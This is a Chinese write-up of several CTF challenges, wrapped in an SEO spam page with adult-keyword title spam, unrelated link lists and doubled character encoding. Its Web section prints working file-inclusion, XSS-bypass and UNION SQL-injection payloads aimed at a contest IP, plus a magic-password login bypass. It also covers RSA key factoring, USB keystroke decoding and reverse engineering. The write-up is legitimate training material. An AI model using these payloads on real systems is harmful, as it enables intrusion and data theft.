中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁(yè) > news >正文

網(wǎng)站建設(shè)意向表360競(jìng)價(jià)推廣怎么做

網(wǎng)站建設(shè)意向表,360競(jìng)價(jià)推廣怎么做,做外貿(mào)網(wǎng)站用什么軟件,景觀設(shè)計(jì)公司資質(zhì)統(tǒng)計(jì)四場(chǎng)的所有題目(共計(jì)12題,四場(chǎng)比賽一共上了21題【包括換題】) 隨便記記,以免老題復(fù)用(已經(jīng)復(fù)用了) Web 文件包含 1 偽協(xié)議 http://120.202.175.143:8011/?cphp://filter/convert.base64-encode/reso…

統(tǒng)計(jì)四場(chǎng)的所有題目(共計(jì)12題,四場(chǎng)比賽一共上了21題【包括換題】)
隨便記記,以免老題復(fù)用(已經(jīng)復(fù)用了)

Web

文件包含 1

偽協(xié)議
http://120.202.175.143:8011/?c=php://filter/convert.base64-encode/resource=hhb.php

PD9waHANCmlmIChmbm1hdGNoKCIqaGhiLnBocCoiLCRzdmlkMSkpew0KJHN2aWQ9ICdTVklEW25nNTQycGg5OHd5cjk3ZnF2NGMzcXZnOW5qazU0MjRlZWRdJzsNCn1lbHNlew0KZWNobyAndHJ5o6EnOw0KfQ0KPz4NCg==

base64解碼

<?php
if (fnmatch("*hhb.php*",$svid1)){
$svid= 'SVID[ng542ph98wyr97fqv4c3qvg9njk5424eed]';
}else{
echo 'try��';
}
?>

文件包含2

樂(lè),共享靶機(jī),被改 flag 了
快結(jié)束的時(shí)候光速換題(換成了上面那個(gè)文件包含)

data偽協(xié)議
?c=data://text/plain,<?php highlight_file("index.php");?>

<?php
if (isset($_GET['c']))
if (!fnmatch ("data*",$_GET['c'])){
echo 'GET c<br>$svid';
} else {
$svid='SVID[nwe9felwh309whec5469089ewfq2cpqr]';
include($_GET['c']);
}
else{
echo 'GET c<br>$svid';
exit;
}
?>

xss

Unicode繞過(guò) 【xsslab原題吧】
先登錄
example:123456
然后輸入:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

點(diǎn)擊鏈接即可

SQL注入

sqlilab原題?
%0a繞過(guò)空格過(guò)濾

?id=0')uNIOn(sELEct(1),(2),(select(user())));%00
?id=0')union(select(1),2,(select%0agroup_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()));%00
?id=0')union(select(1),2,(select%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name="users"));%00
?id=0%27)union(select(1),2,(select%0agroup_concat(password)%0afrom%0ausers));%00
http://120.202.175.143:8014/index/?id=0%27)uNIOn(sELEct(1),2,(select%0agroup_concat(title)%0afrom%0aarticle));%00

萬(wàn)能密碼1

非預(yù)期1: admin:admin直接登錄
非預(yù)期2:curl http://ip:port/svid.php
預(yù)期:(自認(rèn)為)
嘗試常規(guī)的萬(wàn)能用戶密碼,形如admin' or 1=1-- ,密碼默認(rèn)都無(wú)效,甚至都沒(méi)有提示
猜測(cè)密碼可能被hash加密了,就想到了萬(wàn)能字符串ffifdyop
打開(kāi)burp進(jìn)行爆破
在這里插入圖片描述

http://120.202.175.143:8012/?uname=admin%27%20%23&passwd=ffifdyop

萬(wàn)能密碼2

非預(yù)期:curl http://ip:port/svid.php
預(yù)期:

?uname=like' UNION ALL SELECT CONCAT(1,2),NULL-- -&passwd=like

萬(wàn)能密碼3

非預(yù)期:curl http://ip:port/svid.php
預(yù)期:不知道啊

Reverse

re1

不會(huì) re 的都可以做

文件md5 hash為:9083aceef1a0c7ea36183fde040f721e
ida反編譯

unsigned __int64 __fastcall ba(__int64 a1, size_t *a2)
{size_t i; // [rsp+18h] [rbp-68h]char v4[20]; // [rsp+2Ch] [rbp-54h] BYREFchar v5[56]; // [rsp+40h] [rbp-40h] BYREFunsigned __int64 v6; // [rsp+78h] [rbp-8h]v6 = __readfsqword(0x28u);strcpy(&v4[6], "djqjnqdwfyl!");strcpy(v4, "flag{");pp(v5, v4, &v4[6]);pp(v5, v5, &unk_2004);*a2 = strlen(v5);for ( i = 0LL; i < *a2; ++i )*(_BYTE *)(a1 + i) = v5[i];return __readfsqword(0x28u) ^ v6;
}

unk_2004的值為}
ai就給分析出flag了

- strcpy(&v4[6], "djqjnqdwfyl!");:將"djqjnqdwfyl!"復(fù)制到v4[6]開(kāi)始的位置。
- strcpy(v4, "flag{");:將"flag{"復(fù)制到v4[0]。
- pp(v5, v4, &v4[6]);:假設(shè)pp是某種拼接函數(shù)(可能是strcat),將v4("flag{")和&v4[6]("djqjnqdwfyl!")拼接,結(jié)果存入v5,即v5 = "flag{djqjnqdwfyl!"。
- pp(v5, v5, &unk_2004);:將v5和某個(gè)未知字符串(unk_2004)拼接。

re2

ida反編譯看源碼

int __cdecl main(int argc, const char **argv, const char **envp)
{v10 = __readfsqword(0x28u);qmemcpy(v8, "Q[VPL{QVAz]PC^Z]R_QCH]VR_]NZMVSZ]ORM_[HV[SN^AJ", 46);v7 = 55;puts("Welcome to the secret decoder!");puts("Can you figure out the key to unlock the secret message?");puts("The message is hidden inside the program...");for ( i = 0; i <= 999999; ++i );for ( j = 0; *((_BYTE *)v8 + j); ++j );putchar(10);printf("Enter the decryption key (in hexadecimal): ");fgets(s, 100, _bss_start);__isoc99_sscanf(s, "%x", &v4);if ( v7 == v4 ){xor_encrypt_decrypt(v8, v7);printf("Decrypted: %s\n", (const char *)v8);}else{puts("Incorrect key. Try again!");}return 0;
}

如果輸入的v4等于v7,則解密成功
需要輸入16進(jìn)行 (%x)
55的十六進(jìn)制是0x37,輸入37

$ ./bb
Welcome to the secret decoder!
Can you figure out the key to unlock the secret message?
The message is hidden inside the program...Enter the decryption key (in hexadecimal): 37
Decrypted: flag{LfavMjgtimjehftjaehjymzadmjxezhlaldyiv}

Misc

RSA解密

壓縮包里面是一個(gè)flag.zip、rsa公鑰、密文文件
rsa公鑰很短,獲取到n可以進(jìn)行分解
使用RsaCtfTool

$  /opt/RsaCtfTool/RsaCtfTool.py --dumpkey --key rsa_public_key.pem
[!] Using native python functions for math, which is slow. install gmpy2 with: 'python3 -m pip install <module>'.
private argument is not set, the private key will not be displayed, even if recovered.
None
n: 99965623838843374711411183391444104726307314029768628656811347707805304989037
e: 65537

到https://factordb.com/ 分解n得到pq
在這里插入圖片描述

生成私鑰

/opt/RsaCtfTool/RsaCtfTool.py -n 99965623838843374711411183391444104726307314029768628656811347707805304989037 -e 65537 -p 301421686937198008750983790559102741399 -q  331647085034301039007512063728344459163
-----BEGIN RSA PRIVATE KEY-----
MIGqAgEAAiEA3QKJvADgw3sTapG0Bx0KOYVJ+Uy4hfdWtz+fOhShpW0CAwEAAQIg
MzYtWEUTz/gq7ZzJjIRsI62ksoMYL9oST48H90zxqzkCEQDiw7SM9+Zjncud9oGi
q6uXAhEA+YDnu2zTMNUuGGmIUXFnmwIQe7V6hUEkfgnysD1v4Xe4BwIRAJ1GC0zS
sWFjz7WluD8WTCcCEDGBq/10a8U+kL+OpPxp0tM=
-----END RSA PRIVATE KEY-----

使用私鑰解密

$ openssl rsautl -decrypt -in venus.en -inkey 1.pem
The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.
key is 123!@#456

密碼是123!@#456
解壓壓縮包得到flag{78c46c7e7834474f972e3ed44413e27f}

對(duì)數(shù)據(jù)流量進(jìn)行分析

腳本梭哈

import os
import re
# os.system(r"tshark -r 1.pcapng -T fields -e usbhid.data > usbdata.txt")
normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i","0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r","16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1","1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0","28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[","30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/","39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>","40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I","0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R","16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!","1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")","28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{","30": "}", "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?","39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>","40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
output = []
file = r'usbdata.txt'
with open(file, 'r') as file:contents = file.read().split()# print(contents)for cont in contents:if len(cont) == 16:# 兩個(gè)字符 '0000100000000000' => ['00', '00', '10', '00', '00', '00', '00', '00']a = re.findall('.{2}', cont)# print(":".join(a))cont = ":".join(a)  # 00:00:10:00:00:00:00:00try:# 去除不合條件的if cont[0] != '0' or (cont[1] != '0' and cont[1] != '2') or cont[3] != '0' or cont[4] != '0' or cont[9] != '0' or cont[10] != '0' or cont[12] != '0' or cont[13] != '0' or cont[15] != '0' or cont[16] != '0' or cont[18] != '0' or cont[19] != '0' or cont[21] != '0' or cont[22] != '0' or cont[6:8] == "00":continueif cont[6:8] in normalKeys.keys():# 沒(méi)有按 Shift 鍵if cont[1] != '2':output += normalKeys[cont[6:8]]# print(cont, output)# 按了 Shift 鍵else:output += shiftKeys[cont[6:8]]else:output += "??"  # 隨便except:pass
print("結(jié)果:",output)
flag = ""for i in range(0, len(output)):flag += output[i][0]
print(flag)
flag = re.sub("<CAP>(.*?)<CAP>", lambda matchStr: matchStr.group(1).upper(), flag)
# 循環(huán)去除 比如  aaaa<DEL><DEL>這種情況  => aa
while re.findall(r".<DEL>", flag, re.DOTALL):flag = re.sub(r".<DEL>", "", flag, re.DOTALL)
print(flag)

flag需要大寫,逆天
flag{A72BD409-B511-472B-A5A0-2F348BC5B9F3}

或者使用ctf-neta梭哈

Crypto

密碼的(0解)

現(xiàn)在有一個(gè)ctf題目: 小明向網(wǎng)谷杯主辦方發(fā)送了一條加密信息,并給出了加密代碼,遺憾的是,加密代碼也被加密了(300分) 密文信息:==DMeOzM6y2p0ZQB3LzpaMUAxOwZ0kTs 加密代碼:rgvsm06wIkr06uRuoKYFhipDMTZVpi11dxaycA1vo+FHOPxCbxHdkKDGT5M4dzsONhCYZPfBn7R3dCfpzIxwc5Y8Wp7exB44F69ys0vmqsZ4j+AM2zdWhmg+CctVlXWKFF4phnpgb0UhaV0l1JIAq5+AZ9bwZD6KWXkO9aVTeIbRGemcg1KfSCqCzd1Cjg790YjjWUTb84bM9RQdtlVS932Cg2jfHYwWCQJyB0MOCghQLwYcJryRb+JzJ568c5jwwqTymV4ZJbA1KUIl7KfE3+XjZON4q+nv20tuaXI0FW4Az266/u4a7ORXoKvljJbJFImER/mi0Yb8EuhF3CWLy07kAsYFYT7HHUNT1hGMnmTAVNHmmqXPZoOhnMcdmepJ4NEnXIDE1c0Vif+eZzRKuAxqXOB0Lf9CMQ==

原文

http://www.risenshineclean.com/news/54597.html

相關(guān)文章:

  • 嘉興企業(yè)網(wǎng)站建設(shè)推廣礦壇器材友情交換
  • 千鋒教育招聘北京中文seo
  • 免費(fèi)網(wǎng)站代碼如何提升網(wǎng)站seo排名
  • 電子商務(wù)靜態(tài)網(wǎng)站建設(shè)心得上海網(wǎng)絡(luò)營(yíng)銷公司
  • 做外貿(mào)的要有自己的網(wǎng)站嗎網(wǎng)絡(luò)營(yíng)銷渠道可分為
  • 企業(yè)網(wǎng)站的常見(jiàn)服務(wù)直通車關(guān)鍵詞優(yōu)化
  • 廣州網(wǎng)站備案拍照南京網(wǎng)站推廣公司
  • 網(wǎng)頁(yè)和網(wǎng)站做哪個(gè)好用嗎個(gè)人如何優(yōu)化網(wǎng)站有哪些方法
  • joomla與wordpress學(xué)哪個(gè)好企業(yè)seo網(wǎng)站營(yíng)銷推廣
  • 建設(shè)網(wǎng)站 懷疑對(duì)方傳銷 網(wǎng)站制作 緩刑在線網(wǎng)頁(yè)編輯平臺(tái)
  • 建設(shè)一個(gè)電子商務(wù)網(wǎng)站seo 優(yōu)化公司
  • 做視頻怎么去除網(wǎng)站泉州排名推廣
  • WordPress關(guān)站插件廣州今天新聞
  • 做it公司網(wǎng)站站長(zhǎng)域名查詢工具
  • 政府網(wǎng)站建設(shè)整改情況汕頭網(wǎng)絡(luò)營(yíng)銷公司
  • b2c網(wǎng)站代表和網(wǎng)址做銷售最掙錢的10個(gè)行業(yè)
  • 豐胸個(gè)人網(wǎng)站建設(shè)上海優(yōu)化網(wǎng)站公司哪家好
  • 英文自助建站排行榜哪個(gè)網(wǎng)站最好
  • 怎么做網(wǎng)站開(kāi)發(fā)的方案線上營(yíng)銷推廣方式
  • wordpress電腦安裝教程網(wǎng)站seo優(yōu)化報(bào)告
  • 揚(yáng)州網(wǎng)站建設(shè)網(wǎng)絡(luò)營(yíng)銷的方法
  • 科技公司網(wǎng)站源碼企業(yè)網(wǎng)站的優(yōu)化建議
  • 只用django做網(wǎng)站友情鏈接購(gòu)買平臺(tái)
  • 專做網(wǎng)站的公司免費(fèi)網(wǎng)站制作
  • wordpress自定義模塊鄭州粒米seo外包
  • 免費(fèi)搭建網(wǎng)站模板淘寶客怎么做推廣
  • 網(wǎng)上電商教程seo優(yōu)化招聘
  • 阿里云從哪里建設(shè)網(wǎng)站交換友情鏈接的渠道有哪些
  • 備案期間網(wǎng)站要關(guān)閉嗎seo優(yōu)化查詢
  • 服裝網(wǎng)站建設(shè)任務(wù)表網(wǎng)站推廣和優(yōu)化系統(tǒng)